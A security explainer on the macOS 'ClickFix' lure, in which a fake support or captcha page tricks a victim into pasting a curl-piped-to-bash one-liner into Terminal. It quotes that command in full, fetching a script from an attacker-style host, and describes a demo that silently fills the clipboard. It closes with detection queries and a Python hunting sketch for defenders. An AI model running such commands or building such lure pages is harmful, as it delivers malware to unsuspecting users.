Clickfix curl (Mac)

Download and execute a shell script from a remote URL via curl piped to bash. Same technique as the Windows IEX variant (download from URL, execute). Runs in Terminal.

This command runs on macOS
Example Command breakdown
curl -s https://fix-support.icu/pm | bash
  1. Silent HTTP fetch: curl -s

    curl fetches the URL. The -s flag runs silently with no progress bar, reducing suspicion.

  2. Download URL: https://fix-support.icu/pm

    The URL hosts a shell script. The attacker controls the content. Change the file and the same command delivers a different payload.

  3. Pipe: |

    Pipes the downloaded content (stdout) directly into the next command as stdin.

  4. Execute: bash

    bash reads the piped content and executes it as a shell script.

How it works
The attack chain from victim execution to payload delivery on macOS
  1. Victim runs the command

    The bash one-liner is presented on a fake support or fix page. The page copies the command to the clipboard, then prompts the victim to open Terminal (Cmd+Space, type Terminal, Enter), paste with Cmd+V, and press Enter.

  2. HTTP download

    curl -s fetches the content from https://fix-support.icu/pm. The URL hosts a shell script.

  3. Execute

    The pipe sends the downloaded content to bash, which executes it. The script could launch Calculator, run further downloads, or perform other actions.

Implications
Why this technique is effective and hard to defend against
  • One-liner. A single command is easy to paste and run. Low friction for the victim.
  • Seems legitimate. Victims are used to captchas and security checks. A fake reCAPTCHA-style prompt feels familiar and trustworthy.
  • Full script control. The attacker can host any shell script. Change the file at the URL and the same command delivers a different payload.
  • Attacker-controlled at any time. Update the script on the server. No need to redistribute links or documents.
  • URL in command. The domain is visible in the command. Blocklists and URL filtering can help defenders.
Interactive demo
Experience the clickfix flow: a fake security check prompts you to open Terminal (Cmd+Space), paste (Cmd+V), and press Enter.

Note: The command is copied to your clipboard in the background when you click verify, with no prompt and no explicit user interaction. This is how real clickfix attacks work.
Hunting
Detection queries for curl pipe to bash
DeviceProcessEvents
| where Timestamp > ago(7d)
// Matches only when curl, the pipe and bash all appear in one recorded command line
| where ProcessCommandLine contains "curl"
  and ProcessCommandLine contains "|"
  and ProcessCommandLine contains "bash"
| project Timestamp, DeviceName, AccountName, ProcessCommandLine
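
When the one-liner is pasted into Terminal, the shell starts curl and bash as two separate processes, so neither command line carries the "|" character. The following Python sketch is an added example, not part of the original page: it runs over constructed process events (the field names ts, device, ppid, name and cmd are assumptions) and flags both the single-string form and a curl process paired with a sibling shell that reads its script from stdin.

```python
import re
from datetime import datetime, timedelta

SHELLS = {"bash", "sh", "zsh"}
# Whole pipeline inside one command line, e.g. sh -c "curl ... | bash".
INLINE = re.compile(r"\bcurl\b[^|]*\|\s*(bash|sh|zsh)\b")
# curl writing to a file instead of stdout (-o, -O, --output).
TO_FILE = re.compile(r"\s(-\w*[oO]\b|--output\b)")

def ev(ts, device, ppid, name, cmd):
    return {"ts": datetime.fromisoformat(ts), "device": device,
            "ppid": ppid, "name": name, "cmd": cmd}

# Constructed sample events, not real telemetry. Field names are assumptions.
EVENTS = [
    # Pasted into Terminal: the shell starts curl and bash as two processes,
    # so neither command line contains the "|".
    ev("2024-05-01T10:00:00", "mac-01", 500, "curl", "curl -s https://fix-support.icu/pm"),
    ev("2024-05-01T10:00:00", "mac-01", 500, "bash", "bash"),
    # Pipeline passed as a single argument to sh -c.
    ev("2024-05-01T11:00:00", "mac-02", 610, "sh", 'sh -c "curl -s https://fix-support.icu/pm | bash"'),
    # Benign: download to a file, then run a local script.
    ev("2024-05-01T12:00:00", "mac-03", 700, "curl", "curl -s -o /tmp/a.json https://example.com/a.json"),
    ev("2024-05-01T12:00:01", "mac-03", 700, "bash", "bash build.sh"),
]

def reads_stdin(e):
    """A shell with no script argument (only flags) takes its script from stdin."""
    return e["name"] in SHELLS and all(t.startswith("-") for t in e["cmd"].split()[1:])

def hunt(events, window=timedelta(seconds=2)):
    """Return (device, rule, evidence) for inline pipelines and curl/shell sibling pairs."""
    hits = [(e["device"], "inline-pipeline", e["cmd"])
            for e in events if INLINE.search(e["cmd"])]
    for f in events:
        if f["name"] != "curl" or TO_FILE.search(f["cmd"]):
            continue  # not a fetch to stdout
        for s in events:
            if (reads_stdin(s) and s["device"] == f["device"]
                    and s["ppid"] == f["ppid"]
                    and abs(s["ts"] - f["ts"]) <= window):
                hits.append((f["device"], "sibling-pair", f["cmd"] + " | " + s["cmd"]))
    return hits

if __name__ == "__main__":
    for hit in hunt(EVENTS):
        print(hit)
```

The sibling rule is a hunting heuristic: an unrelated shell started by the same parent within the window will also match, so treat hits as leads to review alongside the destination domain.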